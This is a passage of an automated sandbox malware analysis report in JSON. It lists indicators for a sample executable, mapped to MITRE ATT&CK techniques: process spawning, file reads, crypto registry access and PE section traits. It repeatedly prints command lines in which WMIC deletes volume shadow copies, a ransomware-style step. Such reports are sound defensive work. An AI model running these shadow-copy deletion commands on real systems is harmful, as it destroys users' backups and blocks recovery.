\"WMIC.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002948)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-shlwapi-l2-1-0.dll (UID: 00000000-00002948)\n \"WMIC.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002948)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"WMIC.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"WMIC.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76340000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76340000\n \"WMIC.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76340000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-605", "type": 2, "relevance": 1, "name": "May execute SQL queries", "description": "\"SELECT * FROM\" (Source: 43597-821-008508D0, Indicator: \"select * from\")", "origin": "File/Memory", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"WMIC.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"WMIC.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"WMIC.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN\")\n \"WMIC.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-424", "type": 9, "name": "Detected file retrieval based on search patterns", "description": "Process \"cmd.exe\" with commandline \"/c %WINDIR%\\\\System32\\\\wbem\\\\WMIC.exe shadowcopy where \"ID='{811D04C9-F990-4C02-8965-92303C41B4B4}'\" delete\" (UID: 00000000-00006072)\n Process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{811D04C9-F990-4C02-8965-92303C41B4B4}'\" delete\" (UID: 00000000-00005348)\n Process \"cmd.exe\" with commandline \"/c %WINDIR%\\\\System32\\\\wbem\\\\WMIC.exe shadowcopy where \"ID='{C834C388-0440-474D-A901-7C90101BDD5D}'\" delete\" (UID: 00000000-00003036)\n Process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{C834C388-0440-474D-A901-7C90101BDD5D}'\" delete\" (UID: 00000000-00004432)\n Process \"cmd.exe\" with commandline \"/c %WINDIR%\\\\System32\\\\wbem\\\\WMIC.exe shadowcopy where \"ID='{F679DCA4-5EAD-4496-BC1E-B29364E689CB}'\" delete\" (UID: 00000000-00004464)\n Process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{F679DCA4-5EAD-4496-BC1E-B29364E689CB}'\" delete\" (UID: 00000000-00000848)\n Process \"cmd.exe\" with commandline \"/c %WINDIR%\\\\System32\\\\wbem\\\\WMIC.exe shadowcopy where \"ID='{624B7DE9-0366-4000-A7A1-F693118D743C}'\" delete\" (UID: 00000000-00001580)\n Process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{624B7DE9-0366-4000-A7A1-F693118D743C}'\" delete\" (UID: 00000000-00000312)\n Process \"cmd.exe\" with commandline \"/c %WINDIR%\\\\System32\\\\wbem\\\\WMIC.exe shadowcopy where \"ID='{D707BF07-4FB4-4C8B-AA17-67D2E05FA5FB}'\" delete\" (UID: 00000000-00000860)\n Process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{D707BF07-4FB4-4C8B-AA17-67D2E05FA5FB}'\" delete\" (UID: 00000000-00003424)\n Process \"cmd.exe\" with commandline \"/c %WINDIR%\\\\System32\\\\wbem\\\\WMIC.exe shadowcopy where \"ID='{AA6DA2B9-701C-4383-A7B2-B90DC4AE23E7}'\" delete\" (UID: 00000000-00005880)\n Process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{AA6DA2B9-701C-4383-A7B2-B90DC4AE23E7}'\" delete\" (UID: 00000000-00002948)", "origin": "Monitored Target", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"cmd.exe\" with commandline \"/c %WINDIR%\\\\System32\\\\wbem\\\\WMIC.exe shadowcopy where \"ID='{811 ...\" (UID: 00000000-00006072), Spawned process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{811D04C9-F990-4C02-8965-92303C41B4B4}'\" d ...\" (UID: 00000000-00005348), Spawned process \"cmd.exe\" with commandline \"/c %WINDIR%\\\\System32\\\\wbem\\\\WMIC.exe shadowcopy where \"ID='{C83 ...\" (UID: 00000000-00003036), Spawned process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{C834C388-0440-474D-A901-7C90101BDD5D}'\" d ...\" (UID: 00000000-00004432), Spawned process \"cmd.exe\" with commandline \"/c %WINDIR%\\\\System32\\\\wbem\\\\WMIC.exe shadowcopy where \"ID='{F67 ...\" (UID: 00000000-00004464)\n Spawned process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{F679DCA4-5EAD-4496-BC1E-B29364E689CB}'\" d ...\" (UID: 00000000-00000848)\n Spawned process \"cmd.exe\" with commandline \"/c %WINDIR%\\\\System32\\\\wbem\\\\WMIC.exe shadowcopy where \"ID='{624 ...\" (UID: 00000000-00001580), Spawned process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{624B7DE9-0366-4000-A7A1-F693118D743C}'\" d ...\" (UID: 00000000-00000312), Spawned process \"cmd.exe\" with commandline \"/c %WINDIR%\\\\System32\\\\wbem\\\\WMIC.exe shadowcopy where \"ID='{D70 ...\" (UID: 00000000-00000860), Spawned process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{D707BF07-4FB4-4C8B-AA17-67D2E05FA5FB}'\" d ...\" (UID: 00000000-00003424), Spawned process \"cmd.exe\" with commandline \"/c %WINDIR%\\\\System32\\\\wbem\\\\WMIC.exe shadowcopy where \"ID='{AA6 ...\" (UID: 00000000-00005880)\n Spawned process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{AA6DA2B9-701C-4383-A7B2-B90DC4AE23E7}'\" d ...\" (UID: 00000000-00002948)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"cmd.exe\" with commandline \"/c %WINDIR%\\\\System32\\\\wbem\\\\WMIC.exe shadowcopy where \"ID='{811 ...\" (UID: 00000000-00006072), Spawned process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{811D04C9-F990-4C02-8965-92303C41B4B4}'\" d ...\" (UID: 00000000-00005348), Spawned process \"cmd.exe\" with commandline \"/c %WINDIR%\\\\System32\\\\wbem\\\\WMIC.exe shadowcopy where \"ID='{C83 ...\" (UID: 00000000-00003036), Spawned process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{C834C388-0440-474D-A901-7C90101BDD5D}'\" d ...\" (UID: 00000000-00004432), Spawned process \"cmd.exe\" with commandline \"/c %WINDIR%\\\\System32\\\\wbem\\\\WMIC.exe shadowcopy where \"ID='{F67 ...\" (UID: 00000000-00004464)\n Spawned process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{F679DCA4-5EAD-4496-BC1E-B29364E689CB}'\" d ...\" (UID: 00000000-00000848)\n Spawned process \"cmd.exe\" with commandline \"/c %WINDIR%\\\\System32\\\\wbem\\\\WMIC.exe shadowcopy where \"ID='{624 ...\" (UID: 00000000-00001580), Spawned process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{624B7DE9-0366-4000-A7A1-F693118D743C}'\" d ...\" (UID: 00000000-00000312), Spawned process \"cmd.exe\" with commandline \"/c %WINDIR%\\\\System32\\\\wbem\\\\WMIC.exe shadowcopy where \"ID='{D70 ...\" (UID: 00000000-00000860), Spawned process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{D707BF07-4FB4-4C8B-AA17-67D2E05FA5FB}'\" d ...\" (UID: 00000000-00003424), Spawned process \"cmd.exe\" with commandline \"/c %WINDIR%\\\\System32\\\\wbem\\\\WMIC.exe shadowcopy where \"ID='{AA6 ...\" (UID: 00000000-00005880)\n Spawned process \"WMIC.exe\" with commandline \"shadowcopy where \"ID='{AA6DA2B9-701C-4383-A7B2-B90DC4AE23E7}'\" d ...\" (UID: 00000000-00002948)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"WMIC.exe\" (UID: 00000000-00005348) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"cmd.exe\" (UID: 00000000-00003036) was launched with missing environment variables: \"PROMPT\"\n Process \"WMIC.exe\" (UID: 00000000-00004432) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"cmd.exe\" (UID: 00000000-00004464) was launched with missing environment variables: \"PROMPT\"\n Process \"WMIC.exe\" (UID: 00000000-00000848) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"cmd.exe\" (UID: 00000000-00001580) was launched with missing environment variables: \"PROMPT\"\n Process \"WMIC.exe\" (UID: 00000000-00000312) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"cmd.exe\" (UID: 00000000-00000860) was launched with missing environment variables: \"PROMPT\"\n Process \"WMIC.exe\" (UID: 00000000-00003424) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"cmd.exe\" (UID: 00000000-00005880) was launched with missing environment variables: \"PROMPT\"\n Process \"WMIC.exe\" (UID: 00000000-00002948) was launched with new environment variables: \"PROMPT=\"$P$G\"\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"DISMHOST.EXE.67A69857.bin\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DISMHOST.EXE.67A69857.bin\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DISMHOST.EXE.67A69857.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b\" has flags like IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n \"DISMHOST.EXE.67A69857.bin\" has flags like IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e286b@Advapi32.dll\"\n \"0e000f00703f286b@Advapi32.dll\"\n \"0e000f00cc3f286b@Advapi32.dll\"\n \"11001200b447286b@Advapi32.dll\"\n \"110012004848286b@Advapi32.dll\"\n \"120013008c48286b@Advapi32.dll\"\n \"12001300e448286b@Advapi32.dll\"\n \"14001500386e286b@Advapi32.dll\"\n \"14001500506e286b@Advapi32.dll\"\n \"14001500686e286b@Advapi32.dll\"\n \"17001800806e286b@Advapi32.dll\"\n \"0d000e00986e286b@Advapi32.dll\"\n \"11001200a86e286b@Advapi32.dll\"\n \"11001200bc6e286b@Advapi32.dll\"\n \"0f001000fc6f286b@Advapi32.dll\"\n \"140015003c70286b@Advapi32.dll\"\n \"140015005470286b@Advapi32.dll\"\n \"0c000d009c70286b@Advapi32.dll\"\n \"0c000d00ac70286b@Advapi32.dll\"\n \"0e000f00bc70286b@Advapi32.dll\"\n \"0e000f00cc70286b@Advapi32.dll\"\n \"0b000c00dc70286b@Advapi32.dll\"\n \"0d000e006471286b@bcrypt.dll\"\n \"0d000e008471286b@bcrypt.dll\"\n \"0f0010009471286b@bcrypt.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"cmd.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{811D04C9-F990-4C02-8965-92303C41B4B4}'\" delete\" - (UID: 00000000-00006072)\n \"cmd.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{C834C388-0440-474D-A901-7C90101BDD5D}'\" delete\" - (UID: 00000000-00003036)\n \"cmd.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{F679DCA4-5EAD-4496-BC1E-B29364E689CB}'\" delete\" - (UID: 00000000-00004464)\n \"cmd.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{D707BF07-4FB4-4C8B-AA17-67D2E05FA5FB}'\" delete\" - (UID: 00000000-00000860)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b\" has an executable section named \"5xsnjk5u\"\n \"DISMHOST.EXE.67A69857.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b\" has an writable section named \"n5ia3dr6\"\n \"DISMHOST.EXE.67A69857.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"DISMHOST.EXE.67A69857.bin\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b\" was detected as \"VC8 -> Microsoft Corporation\"\n \"DISMHOST.EXE.67A69857.bin\" was detected as \"Visual C++ 2005 Release -> Microsoft\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to access non-existent file \"C:\\Rstrtmgr.dll\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to access non-existent file \"C:\\ncrypt.dll\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to access non-existent file \"C:\\bcrypt.dll\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to access non-existent file \"C:\\Netapi32.dll\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to access non-existent file \"C:\\netutils.dll\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to access non-existent file \"C:\\srvcli.dll\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to access non-existent file \"C:\\wkscli.dll\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to access non-existent file \"C:\\Iphlpapi.dll\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to access non-existent file \"C:\\SHUNIMPL.DLL\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to access non-existent file \"C:\\CRYPTSP.dll\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to access non-existent file \"C:\\Windows\\system32\\wbem\\wbemcomn2.DLL\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to access non-existent file \"C:\\RpcRtRemote.dll\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to access non-existent file \"C:\\Windows\\system32\\wbem\\NTDSAPI.dll\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to access non-existent file \"C:\\cmd.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"WMIC.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"c:\\dotnet.au3\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"c:\\program files\\desktop.ini\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"c:\\users\\desktop.ini\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"c:\\program files\\7-zip\\7-zip.chm\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"c:\\program files\\7-zip\\7z.sfx\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"c:\\program files\\7-zip\\7zcon.sfx\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"c:\\program files\\7-zip\\descript.ion\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"c:\\program files\\7-zip\\history.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"c:\\program files\\7-zip\\license.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"c:\\program files\\autoit3\\au3check.dat\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"c:\\program files\\autoit3\\autoit v3 website.url\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"c:\\program files\\autoit3\\autoit.chm\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"c:\\program files\\ccleaner\\cc_config.ini\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"c:\\program files\\ccleaner\\winapp2.ini\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"c:\\program files\\mozilla firefox\\accessible.tlb\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"c:\\program files\\mozilla firefox\\application.ini\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"c:\\program files\\mozilla firefox\\crashreporter.ini\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"c:\\program files\\mozilla firefox\\dependentlibs.list\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"c:\\program files\\mozilla firefox\\firefox.visualelementsmanifest.xml\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"c:\\program files\\mozilla firefox\\freebl3.chk\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" reads file \"c:\\program files\\mozilla firefox\\install.log\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-159", "type": 6, "relevance": 1, "name": "Writes log files", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" writes a file \"C:\\Program Files\\AutoIt3\\Au3Check.dat\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" writes a file \"C:\\Program Files\\Mozilla Firefox\\install.log\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" writes a file \"C:\\Users\\Default\\NTUSER.DAT\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" writes a file \"C:\\Users\\Default\\NTUSER.DAT.LOG\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" writes a file \"C:\\Users\\Default\\NTUSER.DAT.LOG1\"", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\\DEFAULTS\\PROVIDER\\MICROSOFT ENHANCED RSA AND AES CRYPTOGRAPHIC PROVIDER\"; Key: \"\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\\OFFLOAD\"; Key: \"\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\\DESHASHSESSIONKEYBACKWARD\"; Key: \"\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\TIME ZONES\\ROMANCE STANDARD TIME\\DYNAMIC DST\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", 